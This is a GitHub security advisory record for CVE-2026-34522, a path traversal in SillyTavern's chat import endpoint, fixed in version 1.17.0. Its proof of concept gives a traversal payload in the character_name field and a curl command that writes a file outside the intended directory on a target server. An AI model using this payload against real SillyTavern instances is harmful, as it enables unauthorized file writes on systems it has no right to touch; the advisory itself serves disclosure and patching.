{"id":"GHSA-xvww-xhx6-22pf","summary":"SillyTavern has a path traversal in `/api/chats/import` allows arbitrary file write outside intended chat directory","details":"### Summary\nA path traversal vulnerability in `/api/chats/import` allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into `character_name`.\n\n### Details\n`character_name` is used unsafely as part of the destination filename and then passed into `path.join(...)` without sanitization.\n\nEvidence:\n- Import handler entrypoint:  \n  \u003chttps://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L680-L686\u003e\n- Unsanitized `character_name` used in output filename:  \n  \u003chttps://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L719-L723\u003e\n- Same write pattern in JSONL import branch:  \n  \u003chttps://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L759-L766\u003e\n- Endpoint auth context (authenticated user access):  \n  \u003chttps://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239\u003e\n\nExample payload:\n- `character_name=../../../../tmp/st_poc`\n\nThis causes the final destination path to escape from `\u003cuser\u003e/chats/\u003cavatar\u003e/...` and write to an attacker-controlled location such as `/tmp/...` (or any writable path for the service account).\n\n### PoC\nPrerequisites:\n- Valid authenticated session cookie (`cookie.txt`)\n- Valid CSRF token (`$TOKEN`)\n\nPrepare payload:\n\n```bash\nprintf '{\"user_name\":\"u\",\"chat_metadata\":{}}\\n{\"name\":\"u\",\"mes\":\"owned\"}\\n' \u003e/tmp/poc.jsonl\n```\n\nTrigger arbitrary write:\n\n```bash\ncurl -b cookie.txt -H \"x-csrf-token: $TOKEN\" \\\n  -F \"avatar=@/tmp/poc.jsonl\" \\\n  -F \"file_type=jsonl\" \\\n  -F \"avatar_url=a.png\" \\\n  -F \"character_name=../../../../tmp/st_poc\" \\\n  -F \"user_name=u\" \\\n  http://TARGET:8000/api/chats/import\n```\n\nObserved result:\n- A file is created outside chats directory, for example:  \n  `/tmp/st_poc - \u003ctimestamp\u003e imported.jsonl`\n\n### Impact\n- Integrity: attacker can create files in unintended filesystem locations.\n- Availability: can be used for disk abuse and disruptive file placement.\n- Can become more severe when chained with other local processing behaviors.\n\n### Resolution\n\nThe issue was addressed in version 1.17.0","aliases":["CVE-2026-34522"],"modified":"2026-04-06T17:38:24.466052Z","published":"2026-04-01T21:36:40Z","database_specific":{"nvd_published_at":"2026-04-02T18:16:29Z","cwe_ids":["CWE-22","CWE-73"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-04-01T21:36:40Z"},"references":[{"type":"WEB","url":"https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-xvww-xhx6-22pf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34522"},{"type":"PACKAGE","url":"https://github.com/SillyTavern/SillyTavern"},{"type":"WEB","url":"https://github.com/SillyTavern/SillyTavern/releases/tag/1.17.0"}],"affected":[{"package":{"name":"sillytavern","ecosystem":"npm","purl":"pkg:npm/sillytavern"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.17.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 1.16.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-xvww-xhx6-22pf/GHSA-xvww-xhx6-22pf.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"}]}